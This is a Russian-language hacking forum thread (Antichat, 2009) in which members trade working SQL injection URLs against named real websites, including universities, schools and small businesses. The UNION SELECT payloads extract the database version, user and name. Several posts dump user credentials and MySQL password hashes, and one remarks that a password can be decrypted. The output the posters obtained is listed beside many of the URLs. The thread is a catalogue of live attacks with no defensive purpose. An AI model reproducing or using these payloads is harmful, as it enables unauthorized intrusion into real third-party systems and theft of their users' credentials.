HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.07.2009, 18:13
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
С нами: 8954296

Репутация: 96
По умолчанию

http://palindouble.com/gcards/getnewsitem.php?newsid=1+union+select+1,2,concat(u sername,char(45),userpass),4,5+FROM+gc_cardusers--
 
Ответить с цитированием

  #2  
Старый 02.07.2009, 18:31
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами: 9129884

Репутация: 240
По умолчанию

Код:
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+unhex(hex(concat_ws(0x3a,version(),database(),user()))),2,3,4,5+limit+1,1/*
version():4.1.14-standard
database():umich
user():root@localhost

Есть таблица mysql.user
 
Ответить с цитированием

  #3  
Старый 03.07.2009, 09:37
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
С нами: 9495721

Репутация: 53
По умолчанию

Код HTML:
http://www.paintballxxl.com/news_view.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6--
4.1.25-log:db00077859:00077859@localhost
 
Ответить с цитированием

  #4  
Старый 03.07.2009, 10:37
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

http://www.li.cj.edu.ro/index.php?pagina=activitati&activitate=zilele2008& cat=detalii&id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6--

gabi@localhost:5.0.67-0ubuntu6:licinfo

есть mysql.user

http://www.li.cj.edu.ro/index.php?pagina=activitati&activitate=zilele2008& cat=detalii&id=-1+union+select+1,group_concat(concat_ws(0x3a,user, password,file_priv)),3,4,5,6+from+mysql.user--

пароль расшифровывается)))
 
Ответить с цитированием

  #5  
Старый 03.07.2009, 19:19
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Код:
http://www.backwoodsbeachparty.com/revphp/rev.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11
Код:
beach_reviews@localhost:beach_reviews:5.0.81-community
 
Ответить с цитированием

  #6  
Старый 03.07.2009, 20:35
rolex
Познающий
Регистрация: 07.04.2009
Сообщений: 40
С нами: 8997763

Репутация: 103
По умолчанию

PR 7
Цитата:
http://www.la.unm.edu/~bjudd/PHPMySQL/LA_dining/rest.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7--
LAdining:4.1.20:webuser@localhost
---
Цитата:
http://www.umeko.co.jp/work.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36--
Цитата:
http://www.mv-web.nl/work.php?id=-1+union+select+concat_ws(0x3a,database(),version() ,user())--
Цитата:
http://www.altstudio.be/work.php?pg=2&id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,data base(),version(),user()),10,11,12--
Цитата:
http://www.jacquesbedel.com/work.php?s=-1+union+select+concat_ws(0x3a,database(),version() ,user())--
 
Ответить с цитированием

  #7  
Старый 03.07.2009, 20:48
Shr3k
Новичок
Регистрация: 16.12.2008
Сообщений: 7
С нами: 9158907

Репутация: 20
По умолчанию

PR - 4
Код:
http://www.planet-rock.com/news.php?id=-110+union+select+1,2,3,4,5,6,concat_ws(0x3a,database(),version(),user()),8,9,10--
Database Version: 5.0.67-log

PR - 5
Код:
http://www.daiky.net/main.php?page=articles&aid=-1+union+select+1,2,3,4,5,concat_ws(0x3a,database(),version(),user()),7--&type=brit
Database Version: 4.0.27-standard

Последний раз редактировалось Shr3k; 03.07.2009 в 21:44..
 
Ответить с цитированием

  #8  
Старый 03.07.2009, 21:15
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами: 9650336

Репутация: 662
По умолчанию

Код:
http://pribor-m.ru/main.php?show=a_ob&action=view&id=-110'+union+select+1,2,version(),4,5,6,7,8,9+/*+
4.0.27

Код:
http://belmilk.com/menu.php?id=-4+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+/*+
Код:
http://www.sushi-house.ru/menu.php?id=-4+UnIon+SeLect+1,2,version(),4,5,6,7,8,9,10,11,12,13+/*+
4.1.22

Код:
http://www.bonappetit.net.ru/menu.php?ID=-0+union+select+1,2,version(),4,5,6,7,8+/*+
Код:
http://www.wheatmontana.com/deli-menu.php?id=-6'+UnIon+SeLect+1,2,3,version(),5,6,7+--+
 
Ответить с цитированием

  #9  
Старый 03.07.2009, 21:25
RedX
Познающий
Регистрация: 12.06.2008
Сообщений: 32
С нами: 9427499

Репутация: 22
По умолчанию

Код:
http://wotlk.atricom.ru/index.php?news=-1'+UNION+SELECT+1,concat_ws(0x0b,@@version_compile_os,version()),3,4,5,6--+
pc-linux-gnu
5.0.51a

Последний раз редактировалось RedX; 03.07.2009 в 21:32..
 
Ответить с цитированием

  #10  
Старый 03.07.2009, 22:44
ANUBI$
Участник форума
Регистрация: 16.01.2009
Сообщений: 115
С нами: 9113518

Репутация: 279
По умолчанию

http://www.prestonredman.co.uk/ourservices.php?id=-6+union+select+1,2,3,4,5,6,7,8
4.1.21-community-nt

http://www.legalrecruitment.co.uk/index.php?id=-63+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14
4.0.27-standard-log
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.